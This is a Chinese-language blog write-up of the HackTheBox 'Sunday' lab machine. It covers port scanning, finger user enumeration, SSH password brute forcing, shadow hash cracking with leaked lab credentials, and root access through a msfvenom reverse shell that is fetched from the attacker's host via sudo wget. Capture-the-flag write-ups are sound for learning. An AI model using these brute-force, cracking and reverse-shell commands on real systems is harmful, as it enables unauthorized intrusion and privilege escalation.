Sunday

Posted by on 2020年2月25日


Sunday

nmap扫描端口

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.76 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A 10.10.10.76

file

Google:sun Solaris fingerd exploit

file

use msf

use auxiliary/scanner/finger/finger_users
set rhosts 10.10.10.76
exploit

file

爆破ssh密码,猜测用户名为sunny

git clone https://github.com/danielmiessler/SecLists
patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=SecLists-master/Passwords/probable-v2-top1575.txt persistent=0

file

用户名:sunny
密码:sunday
直接连接出现问题的话参考:参考链接

file

get shashadow.backup

file

破解hash

john -w=/usr/share/wordlists/rockyou.txt hash

file
file

用户名:sammy
密码:cooldude!

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sammy@10.10.10.76 -p 22022

file

get user.txt

file

提权

find / -perm -u=s -type f 2>/dev/null

file

msf生成reverse shell
php搭建http服务器

msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.45 lport=5555 -f elf > /root/Desktop/raj.elf
php -S 0.0.0.0:80
nc -vlp 5555

file

get root shell

cd /tmp
sudo /usr/bin/wget 10.10.14.45/raj.elf -O /usr/bin/rsh
/usr/bin/rsh

file

get root.txt

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据